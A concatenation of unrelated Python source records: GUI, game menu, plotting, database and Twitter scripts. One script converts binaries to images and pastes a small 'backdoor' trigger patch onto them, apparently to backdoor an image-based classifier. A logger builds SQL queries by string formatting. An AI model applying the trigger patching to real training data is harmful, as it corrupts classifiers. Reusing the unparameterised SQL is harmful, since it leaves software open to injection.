wx.Panel(self)\n box = wx.BoxSizer(wx.HORIZONTAL)\n\n self.text = wx.TextCtrl(panel, style=wx.TE_MULTILINE)\n\n\n d_id ,name= DeleteDepsql.getdaat()\n if d_id == []:\n self.rror()\n\n x13 = []\n for i in range(len(d_id)):\n x11 = (str)(d_id[i])\n x11 = x11+\",\"+name[i]\n x13.append(x11)\n lst = wx.ListBox(panel, size=(200, -1), choices=x13, style=wx.LB_SINGLE)\n # lst1 = wx.ListBox(panel, size=(100, -1), choices=las, style=wx.LB_SINGLE)\n\n box.Add(lst, 0, wx.EXPAND)\n box.Add(self.text, 1, wx.EXPAND)\n\n panel.SetSizer(box)\n panel.Fit()\n\n self.Centre()\n self.Bind(wx.EVT_LISTBOX, self.onListBox, lst)\n self.Show(True)\n\n def onListBox(self, event):\n self.text.AppendText(\"Selected id: \" + event.GetEventObject().GetStringSelection() + \"\\n \")\n yesNoBox = wx.MessageDialog(None, 'Do you want Delete this is id?', 'Question', wx.YES_NO)\n yesNoAnswer = yesNoBox.ShowModal()\n yesNoBox.Destroy()\n # print(yesNoAnswer)\n if yesNoAnswer == wx.ID_YES:\n DeleteDepsql.delete(event.GetEventObject().GetStringSelection())\n\n yesNoBox1 = wx.MessageDialog(None, \"Successful deleted \" + event.GetEventObject().GetStringSelection(), 'Notification', wx.OK)\n yesNoAnswer1 = yesNoBox1.ShowModal()\n yesNoBox1.Destroy()\n\n self.Destroy()\n # pass\n # print(\"Hella bitches\")\n\n elif yesNoAnswer == wx.ID_NO:\n print(\"USE dare?\")\n\n\n def rror(self):\n yesNoBox = wx.MessageDialog(None,'List is Empty','Empty', wx.OK)\n\n yesNoAnswer = yesNoBox.ShowModal()\n yesNoBox.Destroy()\n self.Destroy()\n\n\n\n\n\ndef initislise():\n\n ex = wx.App()\n Mywin(None, 'Delete Employee by id')\n ex.MainLoop()\n\ninitislise()","sub_path":"mainproject/Department/Delete_Department.py","file_name":"Delete_Department.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"426877395","text":"# Binary to Image Converter\n# Read executable binary files and convert them RGB and greyscale png images\n#\n# Author: Necmettin Çarkacı\n# E-mail: necmettin [ . ] carkaci [ @ ] gmail [ . ] com\n\nimport os, math\nimport argparse\nfrom PIL import Image, ImageFile\nfrom queue import Queue\nfrom threading import Thread\n\n\ndef getBinaryData(filename):\n binary_values = []\n with open(filename, 'rb') as fileobject:\n # read file byte by byte\n data = fileobject.read(1)\n while data != b'':\n binary_values.append(ord(data))\n data = fileobject.read(1)\n return binary_values\n\ndef createRGBImage(filename, width=None):\n index = 0\n rgb_data = []\n\n # Read binary file\n binary_data = getBinaryData(filename)\n\n # Create R,G,B pixels\n while (index + 3) < len(binary_data):\n R = binary_data[index]\n G = binary_data[index+1]\n B = binary_data[index+2]\n index += 3\n rgb_data.append((R, G, B))\n\n # print(rgb_data)\n size = get_size(len(rgb_data), width)\n # save_file(filename, rgb_data, size, 'RGB')\n\n\ndef save_file(filename, data, size, image_type):\n try:\n image = Image.new(image_type, size)\n image.putdata(data)\n\n # setup output filename\n # dirname = os.path.dirname(filename)\n name, _ = os.path.splitext(filename)\n name = os.path.basename(name)\n imagename = name + '_'+image_type+ '.png'\n # os.makedirs(os.path.dirname(imagename), exist_ok=True)\n\n image.save(imagename)\n print('The file', imagename, 'saved.')\n\n except Exception as err:\n print(err)\n\n\ndef get_size(data_length, width=None):\n if width is None: # with don't specified any with value\n size = data_length\n if (size < 10240):\n width = 32\n elif (10240 <= size <= 10240 * 3):\n width = 64\n elif (10240 * 3 <= size <= 10240 * 6):\n width = 128\n elif (10240 * 6 <= size <= 10240 * 10):\n width = 256\n elif (10240 * 10 <= size <= 10240 * 20):\n width = 384\n elif (10240 * 20 <= size <= 10240 * 50):\n width = 512\n elif (10240 * 50 <= size <= 10240 * 100):\n width = 768\n else:\n width = 1024\n\n height = int(size / width) + 1\n\n else:\n width = int(math.sqrt(data_length)) + 1\n height = width\n\n return (width, height)\n\n\ndef run(file_queue, width):\n while not file_queue.empty():\n filename = file_queue.get()\n createRGBImage(filename, width)\n file_queue.task_done()\n\n\ndef createBackdoorImage(width=None):\n index = 0\n rgb_data = []\n\n backdoor_data = [\n (0, 0, 0), (0, 0, 0), (0, 0, 0), (0, 0, 0),\n (0, 0, 0), (255, 255, 255), (255, 255, 255), (255, 255, 255),\n (255, 255, 255), (255, 255, 255), (255, 255, 255), (255, 255, 255),\n (255, 255, 255), (255, 255, 255), (255, 255, 255), (255, 255, 255)\n ]\n\n image_type = 'RGB'\n size = (4, 4)\n image = Image.new(image_type, size)\n image.putdata(backdoor_data)\n image.save('backdoor_img.png')\n save_file(\"backdoor_img.png\", rgb_data, size, 'RGB')\n # image.show()\n\n\ndef patch_image(target_name):\n index = 0\n rgb_data = []\n\n \"\"\"\n # Read binary file\n bindata = getBinaryData('target.bin')\n\n # Create R,G,B pixels\n while (index + 3) < len(bindata):\n R = bindata[index]\n G = bindata[index+1]\n B = bindata[index+2]\n index += 3\n rgb_data.append((R, G, B))\n \"\"\"\n\n # translate bindata to image\n org_img = Image.open(target_name)\n org_size = org_img.size\n\n # get target size\n target_size = (299, 299)\n ratio = org_size[0]/target_size[0]\n # method: round, trunc, ceil\n target_backdoor_size = round(ratio*4) # default backdoor img size\n \n # resize backdoor image\n backdoor_img = Image.open('backdoor_img.png')\n if not target_backdoor_size:\n return\n backdoor_img = backdoor_img.resize((target_backdoor_size, target_backdoor_size), resample=0)\n\n # combine org binary image and resized backdoor image.\n result_img = org_img.copy()\n position = ((result_img.width - backdoor_img.width), (result_img.height - backdoor_img.height))\n result_img.paste(backdoor_img, position)\n result_img.save(target_name[:-4]+'_restored.png')\n\n \"\"\"\n # image to binary\n patched_bindata = []\n pixels = result_img.load()\n for i in range(result_img.size[0]):\n for j in range(result_img.size[1]):\n patched_bindata.append(pixels[i,j][0])\n patched_bindata.append(pixels[i,j][1])\n patched_bindata.append(pixels[i,j][2])\n # write file.\n with open('target_patched.bin', 'wb') as f:\n f.write(bytearray(patched_bindata))\n \"\"\"\n\n# input: img\n# output: patched_img\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(prog='multi_patch_img.py')\n parser.add_argument(dest='input_dir')\n args = parser.parse_args()\n\n for root, directories, files in os.walk(args.input_dir):\n for filename in files:\n filepath = os.path.join(root, filename)\n # print(filepath)\n patch_image(target_name=filepath)\n","sub_path":"patch/multi_patch_img.py","file_name":"multi_patch_img.py","file_ext":"py","file_size_in_byte":5257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"441361915","text":"import pyglet\nimport draw_unit\nimport const\nclass Menu(object):\n\tSTART=0\n\tEXIT=1\n\tdef to_string(self, mode):\n\t\tif mode==self.START :\n\t\t\treturn \"start\"\n\t\telif mode == self.EXIT :\n\t\t\treturn \"exit\"\n\n\tdef in_range(self, x, y, label):\n\t\tmin_x=label.x - label.content_width/2\n\t\tmax_x=label.x + label.content_width/2\n\t\tmin_y=label.y - label.content_height/2\n\t\tmax_y=label.y + label.content_height/2\n\t\tif (min_x < x < max_x) and (min_y < y < max_y) :\n\t\t\treturn True\n\t\treturn False\n\n\tdef mouse_motion(self, x, y):\n\t\tif self.in_range(x, y, self.start_label) :\n\t\t\tself.mode=self.START\n\t\telif self.in_range(x, y, self.exit_label) :\n\t\t\tself.mode=self.EXIT\n\n\tdef mouse_press(self, x, y, button):\n\t\tif self.in_range(x, y, self.start_label) :\n\t\t\treturn self.to_string(self.START)\n\t\telif self.in_range(x, y, self.exit_label) :\n\t\t\treturn self.to_string(self.EXIT)\n\n\tdef key_press(self, symbol):\n\t\tif symbol == pyglet.window.key.ENTER :\n\t\t\treturn self.to_string(self.mode)\n\t\telif symbol == pyglet.window.key.DOWN :\n\t\t\tself.mode=self.EXIT\n\t\telif symbol == pyglet.window.key.UP :\n\t\t\tself.mode=self.START\n\n\t@property\n\tdef mode(self):\n\t\treturn self._mode\n\n\t@mode.setter\n\tdef mode(self, value):\n\t\tself._mode=value\n\t\tif value == self.START :\n\t\t\tself.start_label.color=(255,0,0,255)\n\t\t\tself.exit_label.color=(255,255,255,255)\n\t\telif value == self.EXIT :\n\t\t\tself.start_label.color=(255,255,255,255)\n\t\t\tself.exit_label.color=(255,0,0,255)\n\n\tdef tick(self):\n\t\tpass\n\n\tdef draw(self):\n\t\tself.batch.draw()\n\n\tdef __init__(self, sound_service):\n\t\tself.sound_service=sound_service\n\t\tself.sound_service.play(self.sound_service.TITLE)\n\t\tself.batch=pyglet.graphics.Batch()\n\t\tgroup0=pyglet.graphics.OrderedGroup(0)\n\t\tgroup1=pyglet.graphics.OrderedGroup(1)\n\t\t#background\n\t\timg=pyglet.image.load(const.Menu.back_img)\n\t\tself.background=draw_unit.Draw_unit(img,\n\t\t\tbatch=self.batch, group=group0)\n\t\t#title\n\t\timg=pyglet.image.load(const.Menu.title_img)\n\t\timg.anchor_x=img.width/2\n\t\timg.anchor_y=img.height/2\n\t\tself.title=draw_unit.Draw_unit(img,\n\t\t\tbatch=self.batch, group=group1)\n\t\tself.title.position=const.Menu.title_pos\n\t\t#start text\n\t\tx, y=const.Menu.start_pos\n\t\tself.start_label=pyglet.text.Label(const.Menu.start_text,\n\t\t\t\tfont_name=const.Menu.font_name,\n\t\t\t\tfont_size=const.Menu.font_size,\n\t\t\t\tx=x, y=y,\n\t\t\t\tanchor_x=\"center\", anchor_y=\"center\",\n\t\t\t\tbatch=self.batch, group=group1)\n\t\t#exit text\n\t\tx, y=const.Menu.exit_pos\n\t\tself.exit_label=pyglet.text.Label(const.Menu.exit_text,\n\t\t\t\tfont_name=const.Menu.font_name,\n\t\t\t\tfont_size=const.Menu.font_size,\n\t\t\t\tx=x, y=y,\n\t\t\t\tanchor_x=\"center\", anchor_y=\"center\",\n\t\t\t\tbatch=self.batch, group=group1)\n\t\tself.mode=self.START\n","sub_path":"bin/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"288741215","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport os\nimport socket\nimport threading\nimport uuid\nfrom datetime import datetime\nfrom db_mysql import BaseMysql\n\n\nclass ClusterJobLog(BaseMysql):\n def __init__(self):\n super(ClusterJobLog, self).__init__()\n self.table_name = 'cluster_job_log'\n\n def save_manual_job(self, save_group_id, subject_id, monitor_type, begin_time,\n end_time, involved_china, save_table_name):\n is_manual = 1\n return self.save_job_log(is_manual, subject_id, monitor_type, begin_time,\n end_time, involved_china, save_table_name, None,\n None, save_group_id, None)\n\n def save_auto_job(self, is_manual, get_group_id,\n language_type, save_group_id, week_fag):\n return self.save_job_log(is_manual, None, None, None,\n None, None, None, get_group_id,\n language_type, save_group_id, week_fag)\n\n def save_job_log(self, is_manual, subject_id, monitor_type, begin_time,\n end_time, involved_china, save_table_name, get_group_id,\n language_type, save_group_id, week_fag):\n \"\"\" job开始, 记录job \"\"\"\n\n # job_id\n job_id = str(uuid.uuid1())\n\n # 主机名\n hostname = socket.gethostname()\n\n # 线程id\n t = threading.currentThread()\n thread_id = str(t.ident)\n\n # 进程id\n process_id = str(os.getpid())\n\n # create_time\n create_time = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n job_start_time = create_time\n\n if is_manual == 1:\n sql = \"\"\"\n INSERT INTO cluster_job_log\n (job_id, hostname, process_id, thread_id, is_manual, subject_id, \n monitor_type, begin_time, end_time, involved_china, save_table_name, job_start_time) \n VALUES ('%s', '%s', '%s', '%s', %d, %d, \n %d, '%s', '%s', %d, '%s', '%s')\n \"\"\" % (job_id, hostname, process_id, thread_id, is_manual, subject_id, monitor_type, begin_time,\n end_time, involved_china, save_table_name, job_start_time)\n else:\n sql = \"\"\"\n INSERT INTO cluster_job_log\n (job_id, hostname, process_id, thread_id, is_manual, get_group_id, \n language_type, save_group_id, week_fag, job_start_time) \n VALUES ('%s', '%s', '%s', '%s', %d, '%s', \n %d, %d, %d, '%s')\n \"\"\" % (job_id, hostname, process_id, thread_id, is_manual, get_group_id, language_type, save_group_id,\n week_fag, job_start_time)\n\n self.execute_with_transaction(sql)\n\n return job_id\n\n def update_job_log(self, job_id, cluster_member_count):\n \"\"\" job完成, 更新job \"\"\"\n\n # create_time\n create_time = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n job_end_time = create_time\n\n sql = \"\"\"\n UPDATE cluster_job_log\n SET cluster_member_count=%d, job_end_time='%s' \n WHERE job_id = '%s'\n \"\"\" % (cluster_member_count, job_end_time, job_id)\n\n self.execute_with_transaction(sql)\n","sub_path":"tmp_proj/clustering_jiachengbing/mlUtil_MOE/dao/mysql/cluster_job_log.py","file_name":"cluster_job_log.py","file_ext":"py","file_size_in_byte":3201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"103317833","text":"from __future__ import division,print_function\nimport numpy as np\nimport scipy as sp\nimport matplotlib as mpl\nimport matplotlib.tri as mplt\nimport matplotlib.pyplot as plt\nimport scipy.io as sio\n#from mpl_toolkits.basemap import Basemap\nimport os as os\nimport sys\nfrom StringIO import StringIO\nfrom gridtools import *\nfrom datatools import *\nfrom misctools import *\nfrom plottools import *\nfrom projtools import *\nfrom regions import makeregions\nnp.set_printoptions(precision=8,suppress=True,threshold=np.nan)\nimport h5py as h5\nfrom matplotlib.collections import PolyCollection as PC\nimport time\nimport multiprocessing\n\nglobal data\nglobal region\nglobal tmparray\nglobal name\nglobal name2\nglobal savepath\nglobal regionname\nglobal savelag1\nglobal savelag2\nglobal lname\n\n\n# Define names and types of data\nname='kit4_kelp_nodrag'\nname2='kit4_kelp_20m_drag_0.018'\ngrid='kit4_kelp'\nregionname='kit4_kelp_tight2_kelpfield'\ndatatype='2d'\n\n\n\n### load the .nc file #####\ndata = loadnc('runs/'+grid+'/' + name +'/output/',singlename=grid + '_0001.nc')\nprint('done load')\ndata = ncdatasort(data)\nprint('done sort')\n\n\n\ncages=loadcage('runs/'+grid+'/' +name2+ '/input/' +grid+ '_cage.dat')\nif np.shape(cages)!=():\n tmparray=[list(zip(data['nodexy'][data['nv'][i,[0,1,2]],0],data['nodexy'][data['nv'][i,[0,1,2]],1])) for i in cages ]\n color='g'\n lw=.1\n ls='solid'\n\n\n\nregion=regions(regionname)\nregion=expand_region(region,[5000,5000],[0,0])\nregion=regionll2xy(data,region)\n\n\n\n\n\n\ndef lag_plot(i):\n print(i)\n\n f = plt.figure()\n ax=f.add_axes([.125,.1,.775,.8])\n\n #plotcoast(ax,filename='pacific.nc',color='k')\n ax.triplot(data['trigridxy'],lw=.25,zorder=1)\n ax.axis(region['regionxy'])\n lseg1=PC(tmparray,facecolor = 'g',edgecolor='None')\n ax.add_collection(lseg1)\n ax.scatter(savelag1['x'][:,i],savelag1['y'][:,i],color='b',label='No drag',s=.25,zorder=10)\n ax.scatter(savelag2['x'][:,i],savelag2['y'][:,i],color='r',label='Drag',s=.25,zorder=15)\n\n handles, labels = ax.get_legend_handles_labels()\n handles[0:2]=[handles[0],handles[-1]]\n labels[0:2]=[labels[0],labels[-1]]\n legend=ax.legend(handles[0:2], labels[0:2],prop={'size':10},loc=4,numpoints=1)\n legend.set_zorder(25)\n\n tstr=time.strftime(\"%d-%H:%M\", time.gmtime(savelag1['time'][i]-savelag1['time'][0]))\n ax.annotate((\"Time: %s\"%tstr),xy=(.025,.95),xycoords='axes fraction',bbox={'facecolor':'white','edgecolor':'None', 'alpha':1, 'pad':3})\n\n f.savefig(savepath +''+name+'_'+name2+'_'+regionname+'_'+lname+'_timestep_'+(\"%05d\"%i)+'.png',dpi=150)\n plt.close(f)\n\n\n\n\n\n\n\nlname='kit4_kelp_tight2_small_north3_480x340_10000pp_s11'\n\n\n\nprint(\"Loading savelag1\")\nfileload=h5.File('savedir/'+name+'/'+lname+'.mat')\nsavelag1={}\nfor i in fileload['savelag'].keys():\n if (i=='x' or i=='y' or i=='time'):\n savelag1[i]=fileload['savelag'][i].value.T \n\nprint(\"Loading savelag2\")\nfileload=h5.File('savedir/'+name2+'/'+lname+'.mat')\nsavelag2={}\nfor i in fileload['savelag'].keys():\n if (i=='x' or i=='y'):\n savelag2[i]=fileload['savelag'][i].value.T \n\n\nsavepath='figures/timeseries/' + grid + '_' + datatype + '/lagtracker/' + name + '_'+name2+'/'+regionname+'/' +lname +'/'\nif not os.path.exists(savepath): os.makedirs(savepath)\n\na,b=savelag2['x'].shape\n\npool = multiprocessing.Pool(3)\npool.map(lag_plot,range(b))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"old_code/lagtracker_compare_timeseries.py","file_name":"lagtracker_compare_timeseries.py","file_ext":"py","file_size_in_byte":3360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"307366316","text":"from mongoengine import *\nimport pdt\n\nclass Task(Document):\n uid = SequenceField()\n title = StringField()\n finished = BooleanField()\n due = DateTimeField()\n\nclass Project(Document):\n uid = SequenceField()\n title = StringField()\n \n #cascade delete does not work with version 0.5\n tasks = ListField(ReferenceField(Task, reverse_delete_rule=CASCADE))\n\ndef get_projects():\n return Project.objects\n\ndef get_project(project_id):\n return Project.objects(uid=project_id).first()\n\ndef new_project(title):\n p = Project()\n p.title = title\n p.save()\n\ndef del_project(project_id):\n p = Project.objects(uid=project_id).first()\n \n # no cascade delete so lets do it this way.\n for t in p.tasks:\n t.delete()\n \n p.delete()\n\ndef edit_project(project_id, title):\n p = Project.objects(uid=project_id).first()\n p.title = title\n p.save()\n \ndef get_tasks(project_id):\n p = Project.objects(uid=project_id).first()\n return p.tasks\n\ndef get_task(task_id):\n return Task.objects(uid=task_id).first()\n\ndef new_task(project_id, title, due = \"tomorrow\", finished = False):\n t = Task(title=title, due=pdt.parse(due), finished=finished)\n\n p = Project.objects(uid=project_id).first()\n p.tasks.append(t)\n\n t.save()\n p.save()\n\ndef del_task(project_id, task_id):\n t = Task.objects(uid=task_id).first()\n \n p = Project.objects(uid=project_id).first()\n p.tasks.remove(t)\n p.save()\n \n # cascade delete will come in next version, manually for now\n t.delete()\n\ndef edit_task(task_id, title, due = \"tomorrow\", finished = False):\n t = Task.objects(uid=task_id).first()\n\n t.title = title\n t.due = pdt.parse(due)\n t.finished = finished\n\n t.save()\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"18531448","text":"# Copyright (C) 2018 Google Inc.\n# Licensed under http://www.apache.org/licenses/LICENSE-2.0 \n\"\"\"REST service for people.\"\"\"\nfrom lib.rest import base_rest_service, rest_convert\n\n\ndef create_person(person):\n \"\"\"Creates a person.\"\"\"\n return base_rest_service.create_obj(\n person,\n name=person.name,\n email=person.email,\n context=rest_convert.default_context())\n","sub_path":"test/selenium/src/lib/rest/person_rest_service.py","file_name":"person_rest_service.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"292652802","text":"# twitter notebook\n# meant as a place to keep scratch work without any other logical place\nimport geocoder # for translating\nimport tweepy as ty# for working with Twitter API\nimport requests # for making requests over the internet\nimport yweather # for getting WOEIDs\nfrom dotenv import load_dotenv, find_dotenv # for handling environmental variables\nimport re # for processing Twitter data\nimport datetime # for working with dates/times\nimport pandas as pd # data processing/analysis tools\n\n#### for obtaining credentials, presumably stored on Heroku, locally in a .env file\nfrom dotenv import find_dotenv, load_dotenv\nload_dotenv(find_dotenv())\nconsumer_key = os.environ.get(\"TW_CONSUMER\")\nconsumer_secret = os.environ.get(\"TW_CONSUMER_SECRET\")\naccess_token = os.environ.get(\"TW_ACCESS\")\naccess_token_secret = os.environ.get(\"TW_ACCESS_SECRET\")\nauth = ty.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\napi = ty.API(auth)\n\n#### yweather get WOEID function. No API keys required.\n#### Useful for working with trends by location, which requires WOEID\n#### Countries have WOEIDs as well. U.S. : 23424977\n\ndef get_WOEID(location):\n client = yweather.Client()\n return(client.fetch_woeid(location))\n\n###### Twitter trends based on location\n# basic request we're after:\n# GET https://api.twitter.com/1.1/trends/place.json?id=XXXX\n# where XXXX = output of woeid fetch call above as an integer.\n# used in heroku app for milestone project\n# this function may be a little cumbersome: each time it is called it makes an API\n# call to get available. Presumably this doesn't change much, so it might be best\n# to update this list less frequently.\n\ndef get_Twitter_trends(location, api_key_dict = None):\n # for use with openAPI_Key function and dictionary of keys; old\n # consumer_key = api_key_dict[\"Twitter Consumer\"]\n # consumer_secret = api_key_dict[\"Twitter Consumer Secret\"]\n # access_token = api_key_dict[\"Twitter Access Token\"]\n # access_token_secret = api_key_dict[\"Twitter Access Token Secret\"]\n auth = ty.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n api = ty.API(auth)\n available = api.trends_available()\n if get_WOEID(location):\n if get_WOEID(location) in [item['woeid'] for item in available]:\n return(api.trends_place(int(get_WOEID(location))), location)\n else:\n g = geocoder.google(location)\n if g.latlng:\n closest_trends = api.trends_closest(g.latlng[0], g.latlng[1])\n return(api.trends_place(closest_trends[0]['woeid']), closest_trends[0]['name'])\n else:\n return(api.trends_place(1), \"worldwide (invalid location entered)\")\n else:\n return(api.trends_place(1), \"worldwide (invalid location entered)\")\n\n# example\nUS_trends = get_Twitter_trends(\"United States\")\n# returns a tuple of length 2, second item is \"United States\"\n# US_trends[0] is list of length 1\n# US_trends[0][0] is dictionary with keys 'locations', 'trends', 'created_at', 'as_of'\nUS_trends_list = US_trends[0][0]['trends']\n# in this case a list of dicts of length 50\n# each dict has keys 'tweet_volume', 'url', 'query', 'name', 'promoted_content'\nUS_trends_df = pd.DataFrame(US_trends_list)\n# a pandas dataframe with\nUS_trends_df.columns\n# returns 'name', 'promoted_content', 'query', 'tweet_volume', 'url'\nidx = US_trends_df.name.str.contains('^#.*', regex=True)\n# gets True/False list for each row, asking if US_trends_df['name'] has a string\n# starting with # and ending with anything.\nUS_hashtags_df = US_trends_df[idx]\n# subsetting the trends dataframe\nUS_hashtags_df_sorted = US_hashtags_df[['name', 'tweet_volume']].sort_values(by=[\"tweet_volume\"],\nascending = False)\n# sorts according to tweet volume.\n\n#### getting streaming API stuff set up. pythoncentral.io helped here.\n# i still don't totally understand classes though.\n\n\nfrom tweepy.streaming import StreamListener\n\nclass StdOutListener(StreamListener):\n\n def on_data(self, data):\n print(data)\n return True\n\n def on_error(self, status):\n print(status)\n\nif __name__ == '__main__':\n\n l = StdOutListener()\n consumer_key = os.environ.get(\"TW_CONSUMER\")\n consumer_secret = os.environ.get(\"TW_CONSUMER_SECRET\")\n access_token = os.environ.get(\"TW_ACCESS\")\n access_token_secret = os.environ.get(\"TW_ACCESS_SECRET\")\n auth = ty.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n stream = ty.Stream(auth, l)\n\n stream.filter(track=[\"string1\", \"string2\"])\n # filters to track by string1, string2. can enter a longer list as well.\n # stop program with Ctrl-C\n # to run, from command line: python file_name.py > twitter_data.text\n # here file_name is the name of the file containing this listener\n\n\n\n\n# a slightly more complex listener\nclass StdOutListener(StreamListener):\n \"\"\" handles data received from the stream \"\"\"\n def __init__(self, api=None):\n super(StdOutListener, self).__init__()\n self.num_tweets = 0\n\n def on_status(self, status):\n # prints text of tweet\n try:\n print(\"Tweet text \"+ status.text)\n print('\\n %s %s via %s\\n', (status.author.screen_name, status.created_at,\n status.source))\n self.num_tweets += 1\n except:\n # ignore printing errors to console\n pass\n\n # for hashtag in status.entries['hashtags']:\n # # prints content of hashtag\n # print(hashtag['text'])\n # not sure about this. I think I should wait until I get the tweets to process\n\n return True\n\n def on_error(self, status_code):\n print(\"Error with status code %s \", status_code)\n return True # continues listening\n\n def on_timeout(self):\n print(\"Timeout...\")\n return True # continues listening\n\ndef main():\n # credentialing\n consumer_key = os.environ.get(\"TW_CONSUMER\")\n consumer_secret = os.environ.get(\"TW_CONSUMER_SECRET\")\n access_token = os.environ.get(\"TW_ACCESS\")\n access_token_secret = os.environ.get(\"TW_ACCESS_SECRET\")\n auth = ty.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n stream = ty.Stream(auth, StreamWatcherListener(), timeout = None)\n stream.sample() # i think i want to use stream.filter and enter a list of\n # strings to track\n\nif __name__ == '__main__':\n listener = StdOutListener()\n auth = ty.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n\n stream = Stream(auth, listener)\n stream.filter(track=[\"string1\", \"string2\"])\n # tracks various strings. here is a good place to feed a list of trends\n # you've gotten from getting those trends.\n\n####\n","sub_path":"python/test/scratch_work.py","file_name":"scratch_work.py","file_ext":"py","file_size_in_byte":6886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"579506170","text":"from collections import namedtuple\nfrom multiprocessing import Queue\nimport random\nimport time\n\nfrom __init__ import SystemConfig\nfrom messages import *\nfrom sim import System, Mailbox\n \nimport socket, threading\nimport random\n\nclass CommunicationThread(threading.Thread):\n def __init__(self):\n threading.Thread.__init__(self)\n \n def run(self):\n\n print(\"empty queue?:\", system.logger.accepted_results_q.empty())\n while True:\n while not system.logger.accepted_results_q.empty():\n s,i,v, status = system.logger.accepted_results_q.get()\n if i not in instance_results_sent_log:\n instance_results_sent_log.add(i)\n print(\"^^^^^^^^^^^^^^^^^^^^^^^^^^^Success for node %i, instance %i\"%(s,i), v, status)\n \n clientSocket = client_dict[v[\"client_id\"]]\n if v[\"type\"] == 'lock':\n msg = \"SUCCESSFULLY ACQUIRED LOCK \" + str(v[\"lock_id\"])\n elif v[\"type\"] == 'unlock':\n msg = \"SUCCESSFULLY RELEASED LOCK \" + str(v[\"lock_id\"])\n clientSocket.send(bytes(msg,'UTF-8'))\n\n\n\n while not system.logger.failed_results_q.empty():\n s2, v2, status2 = system.logger.failed_results_q.get()\n \n print(\"^^^^^^^^^^^^^^^^^^^^^^^^^^^Failure for node %i \"%(s2), v2, status2)\n \n clientSocket = client_dict[v2[\"client_id\"]]\n if v2[\"type\"] == 'lock':\n msg2 = \"FAILURE TO ACQUIRE LOCK \" + str(v2[\"lock_id\"])\n elif v2[\"type\"] == 'unlock':\n msg2 = \"FAILURE TO RELEASE LOCK \" + str(v2[\"lock_id\"])\n clientSocket.send(bytes(msg2,'UTF-8'))\n\n \n\n\n \n\nclass ClientThread(threading.Thread):\n def __init__(self,clientAddress,clientsocket):\n threading.Thread.__init__(self)\n self.csocket = clientsocket\n self.clientAddress = clientAddress\n print (\"New connection added: \", self.clientAddress)\n def run(self):\n print (\"Connection from : \", self.clientAddress)\n\n self.csocket.send(bytes(\"Hi, you are client \" + str(self.clientAddress),'utf-8'))\n \n msg = ''\n while True:\n data = self.csocket.recv(2048)\n msg = data.decode()\n if msg=='bye' or msg == '':\n break\n \n split_messages = msg.split(\" \")\n if len(split_messages) == 2:\n\n method = split_messages[0]\n lock_id = split_messages[1]\n\n if method == \"lock\" and lock_id in locks:\n print(\"LOCKING\")\n print(\"LOCK ID\", lock_id)\n print(\"CLIENT\", self.clientAddress[1])\n\n message = {\"type\": \"lock\", \"lock_id\": int(lock_id), \"client_id\": self.clientAddress[1]}\n node = random.randint(0, number_of_locks - 1)\n print(\"SENDING TO NODE\", node)\n system.mailbox.send(node,ClientRequestMsg(None, message))\n\n \n elif method == \"unlock\" and lock_id in locks:\n print(\"UNLOCKING\")\n print(\"LOCK ID\", lock_id)\n print(\"CLIENT\", self.clientAddress[1])\n\n message = {\"type\": \"unlock\", \"lock_id\": int(lock_id), \"client_id\": self.clientAddress[1]}\n\n node = random.randint(0, number_of_locks - 1)\n print(\"SENDING TO NODE\", node)\n system.mailbox.send(node,ClientRequestMsg(None, message))\n \n else:\n print (\"wrong format\", msg)\n msg = \"Wrong format for message, you should have lock/unlock x \"\n self.csocket.send(bytes(msg,'UTF-8'))\n\n else:\n print (\"wrong format\", msg)\n msg = \"Wrong format for message, you should have lock/unlock x \"\n self.csocket.send(bytes(msg,'UTF-8'))\n \n \n print (\"Client at \", self.clientAddress, \" disconnected...\") \n\n\nnumber_of_locks = 5\nlocks = ['0','1','2','3','4']\n\nLOCALHOST = \"127.0.0.1\"\nPORT = 8080\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\nserver.bind((LOCALHOST, PORT))\nprint(\"Server started\")\n\ninstance_results_sent_log = set()\n \n\nclient_dict = {}\n\nsystem = System(SystemConfig(5))\nsystem.start()\n\n \nprint(\"Waiting for client request..\")\ncommunicationthread = CommunicationThread()\ncommunicationthread.start()\n\nwhile True:\n server.listen(1)\n clientsock, clientAddress = server.accept()\n client_dict[clientAddress[1]] = clientsock\n newthread = ClientThread(clientAddress, clientsock)\n newthread.start()\n\n \nsystem.shutdown_agents()\nsystem.logger.print_results()\n\n\nsystem.quit()\n","sub_path":"lockserver.py","file_name":"lockserver.py","file_ext":"py","file_size_in_byte":4970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"544798156","text":"#Min-Max elements from given array using minimum no. of comaparisons\r\ndef getminmax(low,high,arr):\r\n if low == high: #if single element is present\r\n arr_max = arr[low]\r\n arr_min = arr[low]\r\n return (arr_min,arr_max)\r\n\r\n elif high == low+1: #if two 